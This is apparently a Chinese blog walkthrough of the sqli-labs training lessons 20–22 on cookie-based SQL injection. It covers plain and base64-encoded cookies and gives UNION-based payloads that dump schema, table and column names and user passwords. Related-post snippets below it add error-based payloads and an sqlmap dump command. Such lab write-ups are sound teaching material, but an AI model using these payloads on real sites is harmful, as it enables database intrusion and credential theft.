sqli-labs less-20 less-21 less-22 cookie注入

原创 于 2024-10-09 22:05:20 发布 · 1.6k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#less #前端 #css #数据库 #sql #mysql

COOKIE

作用:是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络行为有关,记录了当前用户的状态
形式:key=value
例如:当我们登录某个账号后,服务器会在cookies进行记录

在这里插入图片描述
在这里插入图片描述
个人理解当我们登录一个网站后。setcookie函数根据我们登录的账户及密码,加上获取当前时间等其他信息,来生成一个cookie,当我们再次访此页面,不需要重新登入,只需要比对cookie信息,比如在less-20中,cookie根据uname生成,然后用cookie中的信息来比对数据库中的uname,如果正确容许访问。负责拒绝

less-20

首先登入一个账号,模拟登入下的注入
登入后用bp抓包

GET /sq/Less-20/index.php HTTP/1.1
Host: 192.168.140.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.140.130/sq/Less-20/index.php
Connection: keep-alive
Cookie:uname=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i

发现相较于之前,没有了post提交的表单信息,而是ookie:uname=admin
发包,页面回显
在这里插入图片描述
页面有cookie信息和name及password
当我们发包时,数据库提取cookie的uname与数据库的uname进行比较。
于是我们便可以在cookie处进行注入

闭合方式

GET /sq/Less-20/index.php HTTP/1.1
Host: 192.168.140.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.140.130/sq/Less-20/index.php
Connection: keep-alive
Cookie:uname=admin' or 1=1 #
Upgrade-Insecure-Requests: 1
Priority: u=0, i

在cookie处多次尝试,确定闭合方式为',方法与前面关卡寻找闭合方式一样。

列数

Cookie:uname=admin’ order by 5 #
Cookie:uname=admin’ order by 4 #
Cookie:uname=admin’ order by 3 #

列数为3

回显位

Cookie:uname=adminaWE’ union select 1,2,3 #
记得uname为假值,来显示union查询的值

报数据

  • 所有表
  • Cookie:uname=adminaWE’ union select 1,group_concat(schema_name),3 from information_schema.schemata#
    security的所有表
  • Cookie:uname=adminaWE’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
    users表的所有列
  • Cookie:uname=adminaWE’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’#
    数据
  • Cookie:uname=adminaWE’ union select 1,group_concat(username,password),3 from security.users #

less-21

本关卡当我们登入的时候发现页面显示
在这里插入图片描述
这里cookie变成了不认识的符号,我们复制过去百度一下,
在这里插入图片描述

发现这是一种编码,为Base64编码,熟悉的热相信一眼便可以看出来,于是我们不难猜测这是将前端表单信息进行编码,上传到后端解码在进行比对,
所以本关与less-20一致,只不过对cookie进行了Base64编码,我们在进行注入的时候可以先将语句写出来,进行编码,然后在bp中进行注入

闭合方式

构造语句并进行编码

在这里插入图片描述
在bp注入
在这里插入图片描述
回显
在这里插入图片描述
不难看出闭合方式为').

报数据

  • 所有表
  • Cookie:uname=adminaWE’) union select 1,group_concat(schema_name),3 from information_schema.schemata#
    编码YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoc2NoZW1hX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEj

security的所有表

  • Cookie:uname=adminaWE’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
    编码
    YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj

users表的所有列

  • Cookie:uname=adminaWE’) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’#
    编码
    YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0ndXNlcnMnIw==

数据

  • Cookie:uname=adminaWE’) union select 1,group_concat(username,password),3 from security.users #
    编码
    YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpLDMgZnJvbSBzZWN1cml0eS51c2VycyAj

less-22

我们发现本关卡也对cookie进行了编码,当我们注入时,发现页面没有回显,当时页面有报错,所以使用报错注入,extractvalue,updatexml,floor都可以使用,闭合方式为".没有其他变化,所以不做过多演示,如果有需要,可以留言,我会将我的语句放在评论区

sqli-labs靶场实现(八)【cookie注入+cookie base64编码注入】(less-20less-22、具体步骤+图文详解)
weixin_46709219的博客
01-03 1340
一)cookie注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 二)cookie base64编码注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 —————————————————————————————————————————————————— 一)cookie注入 1)cookie介绍: 服务器可以利用cookie包含信息的任意性来筛选并经常性的
sqli-labs Less-20cookie注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 438
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户admin:admin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
Sqli-labs靶场第20关详解[Sqli-labs-less-20]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1300
设想如果在Cookie尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。登录后会有记录 Cookie 值。在Cookie 处加上*代表注入点。
sqli-labs(less-20)
m0_64849639的博客
08-06 749
sqli-labs(less-20)
sqli-labs (less-20)
kukudeshuo的博客
03-11 402
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
sqli-labs less-19 less-20 less-22
weixin_74182283的博客
04-02 1245
由于上述所说的cookie原理,一开始是不会有cookie信息的,但登录后,就会自动出现一则cookie信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。
Sqli-labs靶场第2122关详解[Sqli-labs-less-2122]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1450
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 885
一丢丢Sqli-labs小练习
Sqli-labs Less17 报错注入
beiweixiaotian66的博客
07-25 477
一丢丢Sqli-labs小练习
sqli-labs Less20
m0_60829468的博客
11-09 3226
说明 20关在传入参数时会生成cookie,对生成的cookie可以实行注入。 提交参数的第一个数据包 第二个数据包 一、对第二个数据包的cookie实行注入 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(database()),0x7e)) # 二、查表 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(select table...
sqli-labs/Less-20
m0_71299382的博客
11-18 324
sqli-labs第二十关
SQL注入sqli-labs 20 Cookie注入
Zeker62的博客
08-12 430
使用前面关卡知道的账号密码:Dumb和Dumb进入 再进入的同时抓个包,发送到repeater模块 发现这个包有cookie,依据题目的题目明白这是个cookie注入: 加个单引号,报错; 报错信息我们知道这是个字符型注入,那剩下就简单多了 判断回显点 注意:Cookie语句中的注释是# ...
sqli-labs(九)_COOKIE注入
weixin_30877755的博客
08-29 284
第二十关: 这关是一个Cookie处的注入,输入正确的账号密码后,会跳到index.php页面,如下图 这个时候再访问登陆页面的时候http://localhost/sqli-labs-master/Less-20/还是上面的页面,因为登陆后将信息存在了Cookie中,后台进行判断,发现Cookie中有值时会显示上面的个人信息,而不是登录框。在上面哪些信息中可以看到,多出了一个Your I...
sqli-labs-Less-20 cookie注入(全套题目,持续更新)
yzcn
11-21 597
Less-20 cookie注入 **Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 先正常登陆: 返回了输入的name和password,并提示使用cookie注入 判断注入点,使用插件Cookie Editor修改cookie,因为第一次登陆成功,cookie的值会在数据库存放,所以我们第一次登陆成功,后面更改cookie的值进行注入
sqli-labsless22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)...
ajxi63204的博客
01-26 127
注入的过程和less 20 21一样,这次闭合cookie的使用的双引号 转载于:https://www.cnblogs.com/omnis/p/8360957.html
(手工)【sqli-labs20cookie注入:原理、利用过程
07-10 1089
SQL-cookie注入
sqli labs less 20
Xiaoxiaoqiang_的博客
03-04 268
sql注入
sqli_labs less-20cookie注入
niuniu1996的博客
10-15 1100
因为前期已经做过堆叠查询时候将密码换成123456,所以这次登录账户名密码为以下内容 通过bp抓包,分析发现为字符型, 所以在后面加一个#,发现回显正常 此时考虑用报错注入。查出数据库名字 ...
sqli-labs less17-20
sopora的博客
10-09 684
LESS 17 基于错误的UPDATE查询 源码中的几个php函数: get_magic_quotes_gpc() magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“ ”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误 get_magic_quotes_gpc...
sqli-labs less-20
最新发布
08-21
### 第20SQL注入漏洞利用方法及通关教程 sqli-labs平台的第20关涉及的是基于CookieSQL注入漏洞。与常见的基于GET或POST参数的注入方式不同,这一关的注入点位于HTTP Cookie头中,因此需要特别注意请求的构造方式。 #### 1. 确认注入点 第20关的注入点位于`uname`字段,该字段是通过Cookie传递的。在浏览器访问时,通常会发送类似如下的请求头: ``` Cookie: uname=admin ``` 通过修改`uname`的值,可以尝试注入SQL语句。验证是否存在注入漏洞的方法是注入一个会引发数据库错误的值,例如: ``` uname=admin' ``` 如果服务器返回数据库错误信息,则表明可能存在SQL注入漏洞。 #### 2. 获取数据库信息 在确认存在注入漏洞后,可以通过构造特定的SQL语句来获取数据库信息。例如,使用`UNION SELECT`语句来获取当前数据库的名称: ``` uname=admin' UNION SELECT database(), 'test' --+ ``` 该语句会将当前数据库的名称显示在页面上。 #### 3. 获取表名 在获取到数据库名称后(假设数据库名称为`security`),可以进一步获取该数据库中的表名。例如: ``` uname=admin' UNION SELECT group_concat(table_name), 'test' FROM information_schema.tables WHERE table_schema='security' --+ ``` 该语句会列出数据库`security`中的所有表名。 #### 4. 获取字段名 在获取到表名后(例如表名为`users`),可以获取该表中的字段名: ``` uname=admin' UNION SELECT group_concat(column_name), 'test' FROM information_schema.columns WHERE table_name='users' AND table_schema='security' --+ ``` 该语句会列出表`users`中的所有字段名。 #### 5. 获取数据 在获取到字段名后(例如字段名为`username`和`password`),可以获取具体的用户数据: ``` uname=admin' UNION SELECT group_concat(username, ':', password), 'test' FROM security.users --+ ``` 该语句会列出表`users`中的用户名和密码信息。 #### 6. 使用sqlmap进行自动化注入 如果希望使用`sqlmap`工具进行自动化注入,可以使用以下命令: ```bash sqlmap -u "http://192.168.59.1/sqli-labs/Less-20/" --cookie="uname=admin" --current-db --dump --batch ``` 该命令会自动检测注入点,并导出当前数据库的所有数据。 #### 7. 注意事项 - **注入点位置**:由于注入点位于Cookie头中,因此需要确保请求的Cookie字段正确构造。 - **闭合方式**:根据实际情况,可能需要使用不同的闭合方式,例如单引号闭合或双引号闭合。 - **错误信息**:如果服务器未返回错误信息,可以尝试使用盲注技术。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值